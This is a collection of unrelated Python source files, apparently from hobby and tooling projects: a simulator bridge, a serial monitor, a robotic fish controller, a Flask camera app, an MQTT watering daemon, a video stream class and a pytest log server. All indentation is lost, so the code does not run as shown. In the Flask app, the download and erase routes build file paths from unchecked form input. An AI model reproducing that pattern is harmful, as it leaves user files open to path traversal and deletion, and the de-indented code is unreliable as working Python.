message = q.get()
print (message)
if (message == 'quit'):
shutdown()
return
m = message.split('_')
if m[0] == "cruise":
if m[1] == "down":
cruise_button = CruiseButtons.DECEL_SET
if len(btn_list) == 0:
for x in range(btn_hold_times):
btn_list.append(cruise_button)
if m[1] == "up":
cruise_button = CruiseButtons.RES_ACCEL
if len(btn_list) == 0:
for x in range(btn_hold_times):
btn_list.append(cruise_button)
if m[1] == "cancel":
cruise_button = CruiseButtons.CANCEL
if len(btn_list) == 0:
for x in range(btn_hold_times):
btn_list.append(cruise_button)
btn = 0
if len(btn_list) > 0:
btn = btn_list[0]
btn_list.pop(0)
# print ('cruise_button=', cruise_button)
can_function(pm, speed * 3.6, steer_angle, rk.frame, cruise_button=btn, is_engaged=1)
if rk.frame%5 == 0:
throttle, brake, steer = sendcan_function(sendcan)
steer_angle += steer/10000.0 # torque
#print(speed * 3.6, steer, throttle, brake)
if frames % 20 == 0:
dat = messaging.new_message('pandaState')
dat.valid = True
dat.pandaState = {
'ignitionLine': True,
'pandaType': "uno",
'controlsAllowed': True,
'safetyModel': "hondaNidec",
'fanSpeedRpm' : 1000
}
pm.send('pandaState', dat)
frames += 1
rk.keep_time()
shutdown()
def signal_handler(sig, frame):
print('You pressed Ctrl+C!')
shutdown()
if __name__ == "__main__":
signal.signal(signal.SIGINT, signal_handler)
print (sys.argv)
print ("input 1 to curse resume/+")
print ("input 2 to curse set/-")
print ("input 3 to curse cancel")
print ("input q to quit")
main()
|
SystemMonitor.py
|
# List available serial ports
import sys
import glob
import threading
import time
import serial
from Parsing import Data
import numpy as np # NumPy (multidimensional arrays, linear algebra, ...)
import matplotlib as mpl # Matplotlib (2D/3D plotting library)
#import matplotlib.pyplot as plt # Matplotlib's pyplot: MATLAB-like syntax
from pylab import * # Matplotlib's pylab interface
# from colour import Color
# def colourRange(n):
# blue = Color('blue')
# return list(blue.range_to(Color("green"),n))
#
# def plotCalibrationPulseWidths(data, legend):
# colours = colourRange(len(data))
# ion()
#
# for d in data:
# plt.hist(d.BL1, bins = 80, normed=False, color=colours.pop().hex_l)
# plt.legend(legend)
# plt.xlabel("Length of pulses (us)")
# plt.ylabel("Count")
# plt.title("Pulse Width Distribution for Calibration Pulses")
# plt.show
def serial_ports():
"""List serial port names.
raises EnvironmentError:
On unsupported or unknown platforms
returns:
A list of the serial ports available on the system
"""
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
collectData = False
def readSerialData():
while True:
if collectData:
line = ser.readline().rstrip() # read data from serial
Data.readLine(line, data)
if __name__ == '__main__':
myPorts = serial_ports()
for i in range(len(myPorts)):
print "port", i, ": ", myPorts[i]
portNumber = int(raw_input("\nUser port-number: "))
myPort = myPorts[portNumber] if (0 <= portNumber < len(myPorts)) else None
print "Opening serial port ", myPort
# Read from serial
ser = serial.Serial(myPort, 115200)
data = []
serialThread = threading.Thread(target=readSerialData)
serialThread.start()
def getDuartionFromUser():
global collectData
collectData = False
time.sleep(0.1)
#if data:
# plotData(data)
userEntry = raw_input("\nCapture for duration (zero for indefinate): ")
try:
duration = int(userEntry)
if duration > 0:
Data.readLine('N,' + str(duration) + ',', data)
collectTimer = threading.Timer(duration, getDuartionFromUser)
collectTimer.start()
collectData = True
elif duration == 0:
Data.readLine('N,' + str(duration) + ',', data)
collectData = True
raw_input("\nPress enter to stop.")
sys.exit()
except ValueError:
sys.exit()
getDuartionFromUser()
|
exp_cameraman.py
|
import RPi.GPIO as GPIO
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
import os
import time
import threading
import numpy as np
from picamera import PiCamera
from lib_utils import *
from lib_depthsensor import DepthSensor
from lib_fin import Fin
os.makedirs('./data/{}/'.format(U_FILENAME))
class Video():
picam = PiCamera()
picam.resolution = (1296, 972) # max values, have to be 4:3
picam.rotation = 180
CAMLED = 40
GPIO.setup(CAMLED, GPIO.OUT)
GPIO.output(CAMLED, U_CAM_RIGHT) # set to right cam
def start(self):
self.picam.start_recording('./data/{}/video.h264'.format(U_FILENAME))
def stop(self):
self.picam.stop_recording()
def initialize():
"""Initializes all threads which are running fins and a logger instance for the overall status
"""
threading.Thread(target=caudal.run).start()
threading.Thread(target=dorsal.run).start()
threading.Thread(target=pecto_l.run).start()
threading.Thread(target=pecto_r.run).start()
threading.Thread(target=video.start).start()
def terminate():
"""Terminates all threads which are running fins
"""
caudal.terminate()
dorsal.terminate()
pecto_l.terminate()
pecto_r.terminate()
video.stop()
GPIO.cleanup()
def depth_ctrl_from_depthsensor(target_depth):
"""Controls the diving depth to a preset level
Args:
thresh (int, optional): Threshold below which dorsal fin is not controlled, [mm]
"""
thresh = 2
depth_sensor.update()
depth_mm = max(0, (depth_sensor.pressure_mbar - surface_pressure) * 10.197162129779)
if depth_mm > (target_depth + thresh):
dorsal.off()
elif depth_mm < (target_depth - thresh):
dorsal.on()
def main(run_time=60):
while (time.time() - t_start) < run_time:
depth_ctrl_from_depthsensor(250)
# move forward
if 0 < (time.time() - t_start) < 10:
caudal.on()
# turn right
elif 10 < (time.time() - t_start) < 20:
caudal.off()
pecto_l.on()
# move forward
elif 20 < (time.time() - t_start) < 30:
pecto_l.off()
caudal.on()
# move backward
elif 30 < (time.time() - t_start) < 40:
caudal.off()
pecto_r.on()
pecto_l.on()
# turn left
elif 40 < (time.time() - t_start) < 50:
pecto_l.off()
# move forward
elif 50 < (time.time() - t_start) < 60:
pecto_r.off()
caudal.on()
caudal = Fin(U_FIN_C1, U_FIN_C2, 2) # freq, [Hz]
dorsal = Fin(U_FIN_D1, U_FIN_D2, 6) # freq, [Hz]
pecto_r = Fin(U_FIN_PR1, U_FIN_PR2, 3) # freq, [Hz]
pecto_l = Fin(U_FIN_PL1, U_FIN_PL2, 3) # freq, [Hz]
video = Video()
depth_sensor = DepthSensor()
depth_sensor.update()
surface_pressure = depth_sensor.pressure_mbar
initialize()
t_start = time.time()
main(60)
terminate()
|
views.py
|
from flask import Flask, render_template, Response, request, redirect, url_for, send_file
# from ..url_for2 import url_for2
from flask_login import login_required, current_user
import cv2
import datetime, time
import os, sys
import numpy as np
from threading import Thread
from . import cam
from itertools import count
import glob, re
gpio_ok = True
try:
import RPi.GPIO as GPIO
except:
gpio_ok = False
if gpio_ok:
print('GPIO support OK!')
else:
print('WARNING: GPIO in failsafe mode')
capture = False
grey = False
neg = False
camera_on = False
rec = False
verbose = True
# LEDs state
leds_status = [False, False, False, False]
led_labels = { 'led1' : 0, 'led2' : 1, 'led3' : 2, 'led4' : 3}
gpio_led1 = 18
gpio_led2 = 23
gpio_led3 = 24
gpio_led4 = 25
gpio_pins = [gpio_led1, gpio_led2, gpio_led3, gpio_led4]
camera_device = 0
if gpio_ok:
# Set up GPIO pins
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
for pin in gpio_pins:
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin,0)
def led_set(led, on):
if verbose:
print(f'led_set: LED{led + 1} ' + ('ON' if on else 'OFF'))
leds_status[led] = True if on else False
if gpio_ok:
GPIO.output(gpio_pins[led], on)
# not used anywhere
def turn_leds_off():
for led in range(4):
led_set(led, 0)
# not used anywhere
def turn_leds_on():
for led in range(4):
led_set(led, leds_status[led])
#make shots directory to save pics
try:
os.mkdir('./shots')
except OSError as error:
pass
#make videos directory to save videos
try:
os.mkdir('./videos')
except OSError as error:
pass
def cam_record():
global rec, rec_frame, rec_status, camera, camera_on
rec = True
print('Openning VideoCapture inside the thread')
if not camera_on:
camera = cv2.VideoCapture(camera_device)
# Check if camera opened successfully
while not camera.isOpened():
print(f'Unable to read camera feed camera={camera}')
if not rec:
# cv2.destroyAllWindows()
return
# get a valid frame to determine properties
for i in count(1):
print(f'Trying to read (i={i})...')
ret, _ = camera.read()
if ret:
break
if not rec:
return
# Default resolutions of the frame are obtained.The default resolutions are system dependent.
# We convert the resolutions from float to integer.
frame_width = int(camera.get(cv2.CAP_PROP_FRAME_WIDTH))
frame_height = int(camera.get(cv2.CAP_PROP_FRAME_HEIGHT))
frame_rate = int(camera.get(cv2.CAP_PROP_FPS))
print(f'frame_rate={frame_rate}, frame_width={frame_width}, frame_height={frame_height}')
# Define the codec and create VideoWriter object. The output is stored in 'outpy.avi' file.
now = datetime.datetime.now()
out = cv2.VideoWriter('videos/vid_{}.avi'.format(str(now).replace(":",'')), cv2.VideoWriter_fourcc('M','J','P','G'), 20, (frame_width, frame_height))
while True:
rec_status, rec_frame = camera.read()
if rec_status:
# Write the frame into the file 'output.avi'
out.write(rec_frame)
if not rec:
break
# When everything is done, release the video capture and video write objects
if not camera_on:
camera.release()
out.release()
def gen_frames(): # generate frame by frame from camera
global out, capture, rec_frame
while rec or camera_on:
if not rec:
success, frame = camera.read()
if success:
if grey:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
if neg:
frame = cv2.bitwise_not(frame)
if capture:
capture = False
now = datetime.datetime.now()
p = os.path.sep.join(['shots', "shot_{}.png".format(str(now).replace(":",''))])
cv2.imwrite(p, frame)
try:
_, buffer = cv2.imencode('.jpg', cv2.flip(frame,1))
frame = buffer.tobytes()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
except Exception as e:
pass
else:
try:
_, buffer = cv2.imencode('.jpg', rec_frame)
frame = buffer.tobytes()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
except Exception as e:
pass
@cam.route('/camera')
@login_required
def index():
global camera_on, neg, grey, rec, leds_status
return render_template('camera/camera.html', camera_on = camera_on, neg = neg, grey = grey, rec = rec, led1 = leds_status[0], led2 = leds_status[1], led3 = leds_status[2], led4 = leds_status[3])
@cam.route('/video_feed')
@login_required
def video_feed():
if camera_on or rec:
return Response(gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')
else:
return redirect(url_for('.index'))
@cam.route('/cam_requests',methods=['POST','GET'])
@login_required
def tasks():
global camera_on,camera, capture, grey, neg, rec
print('Entering cam_requests')
if request.method == 'POST':
if request.form.get('click'):
capture = True
elif request.form.get('color'):
grey = False
elif request.form.get('grey'):
grey = True
elif request.form.get('pos'):
neg = False
elif request.form.get('neg'):
neg = True
elif request.form.get('start'):
if not camera_on and not rec:
camera = cv2.VideoCapture(camera_device)
camera_on = True
elif request.form.get('stop'):
if camera_on and not rec:
camera.release()
camera_on = False
elif request.form.get('rec_start'):
if not rec:
#Start new thread for recording the video
th = Thread(target = cam_record)
th.start()
time.sleep(1)
elif request.form.get('rec_stop'):
if rec:
rec = False
time.sleep(1)
print('Leaving cam_requests')
return redirect(url_for('.index'))
@cam.route('/tabela',methods=['POST','GET'])
def tabela():
return render_template('camera/tabela.html')
@cam.route('/files',methods=['POST','GET'])
@login_required
def files():
fns = glob.glob('videos/*.avi')
if fns != []:
fns = list(map(lambda x: x.lstrip('videos').lstrip('/'), fns))
dates = list(map(lambda x: re.search(r'[0-9]+-[0-9]+-[0-9]+', x).group(0), fns))
times = list(map(lambda x: re.search(r' [0-9]+\.[0-9]+.avi$', x).group(0).lstrip().rstrip('.avi'), fns))
d = list(map(lambda x, y, z: list([x, y, z]), fns, dates, times))
else:
d = []
return render_template('camera/files.html', data = d)
@cam.route('/file_action',methods=['POST'])
@login_required
def file_action():
if request.form.get('download'):
print('download')
fn = 'vid_{} {}.avi'.format(request.form.get('date'), request.form.get('time'))
print(f'fn={fn} getenv("PWD")={os.getenv("PWD")}')
try:
return send_file('../videos/' + fn)
except Exception as e:
print(str(e))
if request.form.get('erase'):
fn = 'videos/vid_{} {}.avi'.format(request.form.get('date'), request.form.get('time'))
print('erase')
print(f'fn={fn}')
os.unlink(fn)
return redirect(url_for('cam.files'))
@cam.route('/set_led/<string:led>/<int:on>', methods=['GET'])
@login_required
def set_led(led, on):
n = led_labels[led]
led_set(n, on)
return str(on)
@cam.route('/get_led/<string:led>', methods=['GET'])
@login_required
def get_led(led):
n = led_labels[led]
return str('1' if leds_status[led_labels[led]] else '0')
@cam.route('/set_leds', methods = ['POST'])
@login_required
def set_leds():
for led in led_labels:
if request.form.get(led):
led_set(led_labels[led], 1)
else:
led_set(led_labels[led], 0)
return redirect(url_for('cam.index'))
|
__main__.py
|
#!/usr/bin/env python3
"""
The MIT License
Copyright (c) 2019 Kyle Christensen
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import logging
import os
import signal
import sys
import threading
from configparser import ConfigParser
from datetime import datetime
from time import sleep, strftime, time
import paho.mqtt.client as mqtt_client
import requests
from crontab import CronTab
from dateutil.tz import tzlocal
# Setup some global variables because I'm lazy
CFG = None
CRON_KILL = None
CRON_SKIP = None
CRON_THREAD = None
WATER_DURATION = None
WATER_KILL = None
WATER_START = None
WATER_THREAD = None
LOGGER = None
def cb_on_connect(client, userdata, flags, rc):
""" Connect to mqtt broker and subscribe to the bedwetter topic """
LOGGER.info("Connected to the mqtt broker")
client.subscribe(f'{CFG["bedwetter"]["mqtt_topic"]}/event/#')
if "schedule" in CFG["bedwetter"] and CFG["bedwetter"]["schedule"]:
global CRON_KILL
global CRON_SKIP
global CRON_THREAD
CRON_KILL = False
CRON_SKIP = False
CRON_THREAD = threading.Thread(
target=cron_check, args=(lambda: CRON_KILL, lambda: CRON_SKIP,)
)
CRON_THREAD.daemon = True
CRON_THREAD.start()
if not CRON_THREAD.is_alive():
LOGGER.error("Unable to start cron check process")
global WATER_KILL
global WATER_START
global WATER_THREAD
WATER_THREAD = threading.Thread(
target=water_check, args=(lambda: WATER_KILL, lambda: WATER_START,)
)
WATER_THREAD.daemon = True
WATER_THREAD.start()
if not WATER_THREAD.is_alive():
LOGGER.error("Unable to start water check process")
else:
LOGGER.info("Not starting cron check thread, cron time string is not set")
def cb_on_disconnect(client, userdata, rc):
""" Log when disconnected from the mqtt broker """
LOGGER.info("Disconnected from the mqtt broker")
# Kill CRON_THREAD if it is running, otherwise we'll end up with
# a new one on every reconnection to the mqtt broker
try:
if CRON_THREAD.is_alive():
LOGGER.info("Trying to kill cron check, this can take a few seconds")
global CRON_KILL
CRON_KILL = True
CRON_THREAD.join()
if WATER_THREAD.is_alive():
LOGGER.info("Trying to kill water check, this can take a few seconds")
global WATER_KILL
WATER_KILL = True
WATER_THREAD.join()
except NameError:
pass
def cb_on_message(client, userdata, msg):
""" On receipt of a message, do stuff """
if "event/wateringStart" in msg.topic:
LOGGER.info("Received wateringStart mqtt message")
global WATER_DURATION
global WATER_START
if not msg.payload:
WATER_DURATION = CFG["bedwetter"].getint("watering_duration")
else:
WATER_DURATION = int(msg.payload)
WATER_START = True
elif "event/wateringSkip" in msg.topic:
LOGGER.info("Received wateringSkip mqtt message")
if CRON_THREAD.is_alive():
global CRON_SKIP
CRON_SKIP = True
LOGGER.info("Skipping next automated watering")
elif "event/wateringStop" in msg.topic:
# This won't actually interrupt water_on() which blocks the read loop
LOGGER.info("Received wateringStop mqtt message")
global WATER_KILL
WATER_KILL = True
def check_if_watering():
""" Check if we should water today, and if so water """
LOGGER.info("Checking if we're going to water today.")
water = False
if (int(time()) - int(CFG["bedwetter"]["last_water"])) > (
86400 * int(CFG["bedwetter"]["threshold_days"])
):
LOGGER.info(
"More than %s days since last watering, time to water",
CFG["bedwetter"]["threshold_days"],
)
water = True
else:
forecast = fetch_forecast()["forecast"]["daily"]
for day in forecast:
if day["day_num"] == int(strftime("%d")) and day[
"precip_probability"
] < CFG["bedwetter"].getint("threshold_percent"):
LOGGER.info(
"%s%% chance of precipitation in the next day, time to water",
f'{day["precip_probability"]:.0f}',
)
water = True
if water:
publish(
"event/wateringStart", CFG["bedwetter"].getint("water_duration"),
)
else:
log_and_publish(
"log/wateringSkipped",
"Not watering today",
CFG["bedwetter"].getboolean("notify_on_inaction"),
)
def config_load():
""" Load configuration options from file """
global CFG
config_file = os.path.expanduser("~/.config/bedwetter/bedwetter.cfg")
CFG = ConfigParser()
CFG.read(config_file)
if "bedwetter" not in CFG:
sys.exit(f"Fatal Error: Unable to read from configuration file {config_file}")
def config_update():
""" Updates the config file with any changes that have been made """
config_file = os.path.expanduser("~/.config/bedwetter/bedwetter.cfg")
try:
with open(config_file, "w") as cfg_handle:
CFG.write(cfg_handle)
except EnvironmentError:
log_and_publish(
"log/wateringFailure",
"Could not write to configuration file {config_file}",
CFG["bedwetter"].getboolean("notify_on_failure"),
)
def create_paho_client():
""" Setup and create a Paho client """
# Paho is not thread safe, so we'll end up making a few clients
paho_client = mqtt_client.Client()
paho_client.tls_set(
ca_certs=f"{os.path.dirname(__file__)}/ssl/letsencrypt-root.pem"
)
paho_client.username_pw_set(
CFG["bedwetter"]["mqtt_username"], CFG["bedwetter"]["mqtt_password"],
)
return paho_client
def cron_check(kill, skip):
""" Poll until it is time to trigger a watering """
LOGGER.info(
"Started thread to water on schedule (%s)", CFG["bedwetter"]["schedule"]
)
cron = CronTab(f'{CFG["bedwetter"]["schedule"]}')
# The higher this value is, the longer it takes to kill this thread
sleep_interval = 10
while True:
if kill():
LOGGER.info("Received kill signal, killing cron check thread")
break
time_until_cron = cron.next(default_utc=False)
if CFG["bedwetter"].getboolean("debug"):
LOGGER.debug("Time until cron: %s seconds", int(time_until_cron))
if time_until_cron <= sleep_interval:
# Sleep until it's closer to cron time to avoid a possible race
sleep(time_until_cron)
if not skip():
check_if_watering()
else:
global CRON_SKIP
CRON_SKIP = False
log_and_publish(
"log/wateringSkipped",
"Watering skipped",
CFG["bedwetter"].getboolean("notify_on_inaction"),
)
else:
sleep(sleep_interval)
def water_check(kill, start):
""" Poll until it is time to water """
LOGGER.info("Started thread to check for watering events")
# The higher this value is, the longer it takes to kill this thread
sleep_interval = 10
while True:
if kill():
LOGGER.info("Received kill signal, killing water check thread")
break
if start():
global WATER_START
WATER_START = False
LOGGER.info("Water on")
water_on(WATER_DURATION)
water_off()
else:
sleep(sleep_interval)
def fetch_forecast():
""" Fetch a weather forecast from WeatherFlow """
try:
weatherflow_url = (
"https://swd.weatherflow.com/swd/rest/better_forecast/"
f'?api_key={CFG["bedwetter"]["weatherflow_api_key"]}'
f'&station_id={CFG["bedwetter"]["station_id"]}'
)
request = requests.get(
weatherflow_url, timeout=int(CFG["bedwetter"]["timeout"])
)
request.encoding = "utf-8"
return request.json()
except requests.exceptions.ConnectTimeout:
log_and_publish(
"log/wateringFailure",
f'Error: WeatherFlow API timed out after {CFG["bedwetter"]["timeout"]} seconds',
CFG["bedwetter"].getboolean("notify_on_failure"),
)
except requests.exceptions.RequestException:
log_and_publish(
"log/wateringFailure",
"Error: There was an error connecting to the WeatherFlow API",
CFG["bedwetter"].getboolean("notify_on_failure"),
)
def log_and_publish(topic, payload, publish_message=True):
""" Log a message to the logger, and optionally publish to mqtt """
LOGGER.info(payload)
if publish_message:
publish(topic, payload)
def publish(topic, payload, retain=False):
""" Publish messages to mqtt """
client = create_paho_client()
try:
client.connect(
CFG["bedwetter"]["mqtt_server"],
port=CFG["bedwetter"].getint("mqtt_port"),
keepalive=60,
)
# Paho swallows exceptions so I doubt this even works
except Exception as paho_e:
LOGGER.info("Unable to connect to mqtt broker, %s", paho_e)
(return_code, _) = client.publish(
f'{CFG["bedwetter"]["mqtt_topic"]}/{topic}',
payload=payload,
qos=0,
retain=retain,
)
if return_code != 0:
LOGGER.error("Unable to publish message, return code is %s", return_code)
client.disconnect()
def setup_logger():
""" Setup logging to file and stdout """
# Setup date formatting
formatter = logging.Formatter(
"%(asctime)-15s %(levelname)s - %(message)s", datefmt="%b %d %H:%M:%S"
)
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
# Log to stdout
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
# Optionally log to file
if "log_file" in CFG["bedwetter"] and CFG["bedwetter"].getboolean("log_to_file"):
file_handler = logging.FileHandler(
os.path.expanduser(CFG["bedwetter"]["log_file"])
)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
return logger
def water_off():
""" Stop watering """
try:
import automationhat
except ImportError:
import mock
automationhat = mock.Mock()
LOGGER.info("Turning water off")
automationhat.relay.one.off()
if not automationhat.relay.one.is_off():
log_and_publish(
"log/wateringRunaway", "Watering failed to stop",
)
def water_on(duration):
""" Start watering """
try:
import automationhat
except ImportError:
import mock
automationhat = mock.Mock()
LOGGER.info("Watering for %s seconds", duration)
automationhat.relay.one.on()
sleep(duration)
if automationhat.relay.one.is_on():
log_and_publish(
"log/wateringSuccess",
"Watering succeeded",
CFG["bedwetter"].getboolean("notify_on_success"),
)
# Log and retain the last watering date
CFG["bedwetter"]["last_water"] = f"{time():.0f}"
# Home Assistant is really picky about date formats, so no timestamp
publish("log/wateringDate", datetime.now(tzlocal()).isoformat(), True)
config_update()
else:
log_and_publish(
"log/wateringFailure",
"Watering failed to start",
CFG["bedwetter"].getboolean("notify_on_failure"),
)
def main():
""" Main """
# Load config file settings
config_load()
# Setup logging
global LOGGER
LOGGER = setup_logger()
# Create main thread mqtt client and setup callbacks
client = create_paho_client()
client.on_connect = cb_on_connect
client.on_disconnect = cb_on_disconnect
client.on_message = cb_on_message
if CFG["bedwetter"].getboolean("debug"):
# Enable Paho logging using standard logger interface
client.enable_logger(logger=LOGGER)
else:
# Requests shouldn't be so chatty if we're not in debug
logging.getLogger("requests").setLevel(logging.WARNING)
# Connect to mqtt broker
try:
client.connect(
CFG["bedwetter"]["mqtt_server"],
port=CFG["bedwetter"].getint("mqtt_port"),
keepalive=60,
)
# Paho swallows exceptions so I doubt this even works
except Exception as paho_e:
LOGGER.info("Unable to connect to mqtt broker, %s", paho_e)
log_and_publish(
"log/startingUp",
"Startup has completed",
CFG["bedwetter"].getboolean("notify_on_service"),
)
# Catch SIGTERM when being run non-interactively
def shutdown(*args):
log_and_publish(
"log/shuttingDown",
"Caught SIGTERM, shutting down",
CFG["bedwetter"].getboolean("notify_on_service"),
)
# Make sure water is off before we exit
water_off()
sys.exit(0)
signal.signal(signal.SIGTERM, shutdown)
try:
client.loop_forever()
except KeyboardInterrupt:
LOGGER.info("KeyboardInterrupt received, shutting down")
client.disconnect()
sys.exit(0)
if sys.version_info >= (3, 7):
if __name__ == "__main__":
main()
else:
sys.exit("Fatal Error: This script requires Python 3.7 or greater")
|
video_stream.py
|
# Based on code from the excellent: PyImageSearch.com
from threading import Thread, Lock
import cv2
from loguru import logger
@logger.catch
class VideoStream:
"""Create a thread and read frames from video source.
If we can't find video on the hardware camera, try streamlink.
Keyword arguments:
src -- a camera or video, defaults to hardware-connected webcam (default 0)
fps -- (float) (default 30.0)
streamlink_url -- (default https://www.mixer.com/)
streamlink_quality -- useful values include 'audio_only', '480p', 'best', 'worst' (default '480p')
"""
def __init__(self, src=0, fps=30.0, use_streamlink_backup=True, streamlink_url="https://www.twitch.tv/PistolPete2506", streamlink_quality='480p'):
"""Initialize the video camera stream and read the first frame from the stream to test it."""
logger.debug(f"Setting VideoStream to: {src}")
self.stream = cv2.VideoCapture(src)
(_ok, self.frame) = self.stream.read()
if not _ok:
logger.warning("No video input found using source")
logger.debug("Trying streamlink source...")
import streamlink
streams = streamlink.streams(streamlink_url)
if streams:
logger.debug(f"Streamlink found the following streams at {streamlink_url}\n\n{streams}\n")
stream_url = streams[streamlink_quality].to_url()
else:
raise VideoStreamError("No streams were available")
self.stream = cv2.VideoCapture(stream_url)
self.grabbed = None
self.thread = None
self.started = False
self.read_lock = Lock()
def __exit__(self, exc_type, exc_value, traceback):
self.stream.release()
def start(self):
"""Start the thread to read frames from the video stream."""
if self.started:
logger.warning("Thread already started!!")
return None
self.started = True
self.thread = Thread(target=self.update, args=())
self.thread.start()
return self
def update(self):
"""Keep looping infinitely until the thread is stopped."""
while self.started:
(grabbed, _frame) = self.stream.read()
self.read_lock.acquire()
self.grabbed, self.frame = grabbed, _frame
self.read_lock.release()
def read(self):
"""Return the most recently read frame."""
self.read_lock.acquire()
_frame = self.frame.copy()
self.read_lock.release()
return _frame
def stop(self):
"""Indicate that the thread should be stopped."""
self.started = False
self.thread.join()
class VideoStreamError(Exception):
pass
if __name__ == "__main__":
vs = VideoStream().start()
while True:
frame = vs.read()
cv2.imshow('Example Frame', frame)
if cv2.waitKey(1) == 27:
break
vs.stop()
cv2.destroyAllWindows()
|
log_server.py
|
"""
Log Server
==========
"""
import logging
import threading
import attr
import msgpack
import pytest
import zmq
from saltfactories.utils import platform
from saltfactories.utils import ports
from saltfactories.utils import time
log = logging.getLogger(__name__)
@attr.s(kw_only=True, slots=True, hash=True)
class LogServer:
log_host = attr.ib()
log_port = attr.ib()
log_level = attr.ib()
running_event = attr.ib(init=False, repr=False, hash=False)
sentinel_event = attr.ib(init=False, repr=False, hash=False)
process_queue_thread = attr.ib(init=False, repr=False, hash=False)
@log_host.default
def _default_log_host(self):
if platform.is_windows():
# Windows cannot bind to 0.0.0.0
return "127.0.0.1"
return "0.0.0.0"
@log_port.default
def _default_log_port(self):
return ports.get_unused_localhost_port()
def start(self):
log.info("%s starting...", self)
self.sentinel_event = threading.Event()
self.running_event = threading.Event()
self.process_queue_thread = threading.Thread(target=self.process_logs)
self.process_queue_thread.start()
# Wait for the thread to start
if self.running_event.wait(5) is not True: # pragma: no cover
self.running_event.clear()
raise RuntimeError("Failed to start the log server")
log.info("%s started", self)
def stop(self):
log.info("%s stopping...", self)
address = "tcp://{}:{}".format(self.log_host, self.log_port)
context = zmq.Context()
sender = context.socket(zmq.PUSH)
sender.connect(address)
try:
sender.send(msgpack.dumps(None))
log.debug("%s Sent sentinel to trigger log server shutdown", self)
if self.sentinel_event.wait(5) is not True: # pragma: no cover
log.warning(
"%s Failed to wait for the reception of the stop sentinel message. Stopping anyway.",
self,
)
finally:
sender.close(1000)
context.term()
# Clear the running even, the log process thread know it should stop
self.running_event.clear()
log.info("%s Joining the logging server process thread", self)
self.process_queue_thread.join(7)
if not self.process_queue_thread.is_alive():
log.debug("%s Stopped", self)
else: # pragma: no cover
log.warning(
"%s The logging server thread is still running. Waiting a little longer...", self
)
self.process_queue_thread.join(5)
if not self.process_queue_thread.is_alive():
log.debug("%s Stopped", self)
else:
log.warning("%s The logging server thread is still running...", self)
def process_logs(self):
address = "tcp://{}:{}".format(self.log_host, self.log_port)
context = zmq.Context()
puller = context.socket(zmq.PULL)
exit_timeout_seconds = 5
exit_timeout = None
try:
puller.bind(address)
except zmq.ZMQError: # pragma: no cover
log.exception("%s Unable to bind to puller at %s", self, address)
return
try:
self.running_event.set()
while True:
if not self.running_event.is_set():
if exit_timeout is None:
log.debug(
"%s Waiting %d seconds to process any remaning log messages "
"before exiting...",
self,
exit_timeout_seconds,
)
exit_timeout = time.time() + exit_timeout_seconds
if time.time() >= exit_timeout:
log.debug(
"%s Unable to process remaining log messages in time. Exiting anyway.",
self,
)
break
try:
try:
msg = puller.recv(flags=zmq.NOBLOCK)
except zmq.ZMQError as exc:
if exc.errno != zmq.EAGAIN: # pragma: no cover
raise
time.sleep(0.25)
continue
if msgpack.version >= (0, 5, 2):
record_dict = msgpack.loads(msg, raw=False)
else: # pragma: no cover
record_dict = msgpack.loads(msg, encoding="utf-8")
if record_dict is None:
# A sentinel to stop processing the queue
log.info("%s Received the sentinel to shutdown", self)
self.sentinel_event.set()
break
try:
record_dict["message"]
except KeyError: # pragma: no cover
# This log record was msgpack dumped from Py2
for key, value in record_dict.copy().items():
skip_update = True
if isinstance(value, bytes):
value = value.decode("utf-8")
skip_update = False
if isinstance(key, bytes):
key = key.decode("utf-8")
skip_update = False
if skip_update is False:
record_dict[key] = value
# Just log everything, filtering will happen on the main process
# logging handlers
record = logging.makeLogRecord(record_dict)
logger = logging.getLogger(record.name)
logger.handle(record)
except (EOFError, KeyboardInterrupt, SystemExit): # pragma: no cover
break
except Exception as exc: # pragma: no cover pylint: disable=broad-except
log.warning(
"%s An exception occurred in the processing queue thread: %s",
self,
exc,
exc_info=True,
)
finally:
puller.close(1)
context.term()
log.debug("%s Process log thread terminated", self)
@pytest.hookimpl(trylast=True)
def pytest_configure(config):
# If PyTest has no logging configured, default to ERROR level
levels = [logging.ERROR]
logging_plugin = config.pluginmanager.get_plugin("logging-plugin")
try:
level = logging_plugin.log_cli_handler.level
if level is not None:
levels.append(level)
except AttributeError: # pragma: no cover
# PyTest CLI logging not configured
pass
try:
level = logging_plugin.log_file_level
if level is not None:
levels.append(level)
except AttributeError: # pragma: no cover
# PyTest Log File logging not configured
pass
if logging.NOTSET in levels:
# We don't want the NOTSET level on the levels
